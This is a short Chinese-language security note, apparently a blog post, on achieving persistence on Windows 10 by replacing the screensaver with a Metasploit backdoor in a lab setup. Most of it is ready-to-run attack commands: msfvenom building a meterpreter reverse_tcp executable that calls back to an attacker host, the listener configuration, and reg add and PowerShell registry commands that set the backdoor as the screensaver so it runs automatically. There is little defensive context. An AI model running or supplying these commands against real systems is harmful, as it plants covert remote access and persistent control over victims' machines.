返回首页
EN
H7 / SECURITY RESEARCH NOTES

利用Windows屏幕保护功能结合MSF实现权限维持

环境说明

IPHOSTNAMENOTE
172.16.106.67kali_dqy攻击者主机
10.10.10.88win10_dqy受害者主机

前言

  • 屏幕保护程序是Windows自带的系统功能,用户在一段时间不活动后自动放置屏幕动画。但是由于屏幕保护程序是具有.src文件扩展名的可执行文件,所以其常常被攻击者作为持久化的方式之一。

  • 屏幕保护程序设置存储在如下注册表中:

HKCU\Control Panel\Desktop

  • 默认Win10没有设置屏幕保护程序,可通过控制面板中搜索屏幕保护程序,来设置屏幕保护程序,设置成功后,注册表中将增加相应的键值。

攻击过程

配置MSF

  • 生成后门程序
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=172.16.106.67 LPORT=2335 -f exe > attack_demo.exe
  • 配置MSF监听端口
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 172.16.106.67
set lport 2335
exploit

替换屏幕保护程序为后门程序

  • 将生成的后门程序attack_demo.exe后缀替换为scr。
  • 然后进行替换注册表键值,cmd可以采用reg add命令进行键值替换
reg add "hkcu\control panel\desktop" /v SCRNSAVE.EXE /d E:\payload\attack_demo.scr

  • powershell采用Set-ItemProperty命令进行替换
Set-ItemProperty -Path 'HKCU:\Control Panel\Desktop\' -Name 'SCRNSAVE.EXE' -Value 'E:\payload\attack_demo.scr'

执行结果

  • 等待60秒后,触发后门程序,上线MSF

参考链接

1.https://paper.seebug.org/1007/
2.https://www.its500.com/article?url=xiaozi/p/11833495.html